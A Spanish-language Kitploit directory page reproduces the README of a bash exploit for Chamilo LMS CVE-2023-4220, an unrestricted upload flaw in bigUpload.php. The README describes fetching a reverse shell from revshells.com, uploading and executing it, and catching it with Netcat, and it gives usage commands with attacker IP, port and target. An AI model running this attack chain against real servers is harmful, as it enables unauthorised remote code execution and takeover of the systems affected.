Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Chamilo-LMS-CVE-2023-4220-Exploit — Refurbish Chamilo LMS CVE-2023-4220 exploit escrito en bash | Kitploit
Herramientas/GitHubGitHub/0xdtc/chamilo-lms-cve-2023-4220-exploit
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHub0xdtc/chamilo-lms-cve-2023-4220-exploit

Chamilo-LMS-CVE-2023-4220-Exploit

Refurbish Chamilo LMS CVE-2023-4220 exploit escrito en bash

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 1 añoAún no revisado

Exploit de Chamilo LMS CVE-2023-4220

Descripción general

Este script explota una vulnerabilidad de Ejecución Remota de Código (RCE) en Chamilo LMS versiones ≤ v1.11.24. La vulnerabilidad (CVE-2023-4220) existe debido a la funcionalidad de carga de archivos sin restricciones en la característica bigUpload.php de Chamilo LMS, lo que permite a los atacantes subir archivos arbitrarios (como webshells) y ejecutarlos, llevando a una ejecución remota de código completa en el servidor.

Este script ha sido mejorado por Divine Clown para agilizar el proceso de explotación, generando automáticamente un archivo de reverse shell, subiéndolo al objetivo e iniciando un listener para dar al atacante acceso directo a la shell.


Detalles del CVE

  • ID del CVE: CVE-2023-4220
  • Software afectado: Chamilo LMS ≤ v1.11.24
  • Tipo de vulnerabilidad: Ejecución Remota de Código (RCE)
  • Vector de ataque: Carga de archivos sin restricciones en /main/inc/lib/javascript/bigupload/inc/bigUpload.php

Características

  • Descarga automáticamente un reverse shell desde revshells.com basado en la IP y puerto del atacante.
  • Sube el reverse shell usando el endpoint vulnerable bigUpload.php.
  • Ejecuta silenciosamente la shell y abre un listener de Netcat para acceso directo.

Mejora de Divine Clown:

  • Todos los pasos intermedios (descarga de la shell, subida, etc.) están ocultos, mostrando solo el reverse shell resultante para un uso simplificado.

Uso

root@kitploit:~
./CVE-2023-4220.sh -i <ip_atacante> -p <puerto> -h <enlace_host>

Parámetros:

  • -i <ip_atacante>: La dirección IP del atacante para el reverse shell.
  • -p <puerto>: El puerto donde se iniciará el listener de Netcat.
  • -h <enlace_host>: La URL completa de la instancia vulnerable de Chamilo LMS.

Ejemplo:

root@kitploit:~
./CVE-2023-4220.sh -i 10.10.14.15 -p 9001 -h http://target-site.com

Requisitos previos

  • Netcat instalado en tu máquina.
  • Asegúrate de que la versión objetivo de Chamilo LMS sea vulnerable (≤ v1.11.24).
  • Permisos adecuados para realizar pruebas de penetración o explotación.

Desglose técnico

  1. El script descarga un reverse shell desde revshells.com, generándolo dinámicamente según la IP y puerto del atacante.
  2. El reverse shell se sube al endpoint vulnerable bigUpload.php.
  3. El archivo subido se ejecuta accediendo a su URL en el servidor.
  4. Se inicia un listener de Netcat y, una vez que se activa el archivo, se establece una conexión reverse shell, dando al atacante acceso a la línea de comandos.

Aviso legal

Esta herramienta está destinada únicamente para fines educativos y entornos de prueba en los que tengas permiso explícito para explotar vulnerabilidades. El acceso no autorizado a sistemas es ilegal y puede conllevar cargos penales. Los autores no serán responsables por el mal uso o daños causados por este script.


Créditos

  • Autor original del exploit: Ziad Sakr @Ziad-Sakr
  • Mejoras y refinamientos: YO (Divine Clown)

Siéntete libre de modificar este README si deseas incluir información adicional o formato. ¡Avísame si necesitas algo más!

Descargar herramienta